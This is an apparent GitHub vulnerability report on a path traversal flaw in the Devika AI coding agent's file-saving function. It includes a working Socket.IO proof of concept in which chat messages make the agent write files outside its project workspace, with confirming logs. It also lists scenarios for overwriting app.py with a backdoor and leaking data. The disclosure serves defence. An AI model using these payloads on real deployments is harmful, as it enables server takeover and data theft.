Describe the bug
CRITICAL SECURITY VULNERABILITY: The Coder Agent's save_code_to_project function contains a path traversal vulnerability that allows attackers to write files outside the intended project workspace, potentially compromising the entire server.
Vulnerability Type: CWE-22 Path Traversal
CVSS Score: 8.8 (High)
Affected File: src/agents/coder/coder.py:73
Affected Function: Coder.save_code_to_project
Entry Point: Socket.IO user-message event
Root Cause: The function constructs file paths using user-controlled input without proper boundary validation:
# Line 73 - VULNERABLE CODE
file_path = os.path.join(project_path, file_name) # No path validation
with open(file_path, 'w') as f:
f.write(code)Security Impact:
- Arbitrary File Write: Write files anywhere on the server filesystem
- Code Execution: Overwrite Python modules or system files
- Data Exfiltration: Write sensitive data to web-accessible directories
- Persistence: Plant backdoors in startup scripts
How To Reproduce
Prerequisites
-
Start Devika server:
cd devika
python3 -m venv venv
source venv/bin/activate # On Windows: venv\Scripts\activate
pip install -r requirements.txt
python app.py
-
Access web UI at http://localhost:1337
-
Create a new project via the UI
Steps to reproduce the behavior
-
Connect to Socket.IO endpoint:
import socketio
sio = socketio.Client()
sio.connect('http://localhost:1337')
-
Send malicious user message to trigger Coder agent:
# First, create a baseline file in the project
sio.emit('user-message', {
'message': 'Create a file called bootstrap.py with print("hello")',
'project_name': 'test-project'
})
# Wait for agent to complete...
-
Send path traversal payload:
# Trigger path traversal via Coder agent
sio.emit('user-message', {
'message': 'Create a file at ../../devika_coder_escape.txt with content "PWNED"',
'project_name': 'test-project'
})
-
Verify file was written outside project workspace:
# File should exist at: data/devika_coder_escape.txt
# (escaped from data/projects/test-project/)
cat data/devika_coder_escape.txt
# Output: PWNED
Expected behavior
- File paths should be validated and normalized before writing
- Paths containing
.. should be rejected or sanitized
- All file operations should be confined to the project workspace
- Absolute paths should be rejected
Screenshots and logs
Backend Logs:
[2026-04-10 04:13:56] Agent state: completed
[2026-04-10 04:13:56] Terminal: vim bootstrap.py
[2026-04-10 04:13:56] Output: print('bootstrap')
[2026-04-10 04:13:59] Agent state: completed
[2026-04-10 04:13:59] Terminal: vim ../../devika_coder_escape.txt
[2026-04-10 04:13:59] Output: DEVIKA_CODER_LIVE_POC
[2026-04-10 04:13:59] WARNING: File written outside project workspace!
Validation Evidence:
{
"project_root": "data/projects/test-project",
"escape_target": "data/devika_coder_escape.txt",
"escape_target_exists": true,
"escape_target_within_project_root": false,
"escape_target_content": "DEVIKA_CODER_LIVE_POC"
}File System Evidence:
data/
├── projects/
│ └── test-project/
│ └── bootstrap.py ✓ Expected location
└── devika_coder_escape.txt ❌ ESCAPED PROJECT WORKSPACE
Configuration
- OS: Windows
- Python version: 3.10+
- Node version: 18.0.0
- bun version: 0.1.0
- search engine: google
- Model: gpt-4
Additional context
Validation Status: ✅ CONFIRMED with real Socket.IO entry point
Attack Scenarios:
-
Overwrite application code:
Message: "Create file at ../../app.py with malicious code"
Result: Main application file overwritten with backdoor
-
Exfiltrate data to web directory:
Message: "Create file at ../../../static/leaked_data.json"
Result: Sensitive data accessible via HTTP
-
Modify configuration:
Message: "Create file at ../../config.toml with malicious settings"
Result: Application configuration compromised
Related Vulnerabilities: This repository contains 2 additional identical vulnerabilities in Feature and Patcher agents (reported separately).
Describe the bug
CRITICAL SECURITY VULNERABILITY: The Coder Agent's
save_code_to_projectfunction contains a path traversal vulnerability that allows attackers to write files outside the intended project workspace, potentially compromising the entire server.Vulnerability Type: CWE-22 Path Traversal
CVSS Score: 8.8 (High)
Affected File:
src/agents/coder/coder.py:73Affected Function:
Coder.save_code_to_projectEntry Point: Socket.IO
user-messageeventRoot Cause: The function constructs file paths using user-controlled input without proper boundary validation:
Security Impact:
How To Reproduce
Prerequisites
Start Devika server:
Access web UI at
http://localhost:1337Create a new project via the UI
Steps to reproduce the behavior
Connect to Socket.IO endpoint:
Send malicious user message to trigger Coder agent:
Send path traversal payload:
Verify file was written outside project workspace:
Expected behavior
..should be rejected or sanitizedScreenshots and logs
Backend Logs:
Validation Evidence:
{ "project_root": "data/projects/test-project", "escape_target": "data/devika_coder_escape.txt", "escape_target_exists": true, "escape_target_within_project_root": false, "escape_target_content": "DEVIKA_CODER_LIVE_POC" }File System Evidence:
Configuration
Additional context
Validation Status: ✅ CONFIRMED with real Socket.IO entry point
Attack Scenarios:
Overwrite application code:
Exfiltrate data to web directory:
Modify configuration:
Related Vulnerabilities: This repository contains 2 additional identical vulnerabilities in Feature and Patcher agents (reported separately).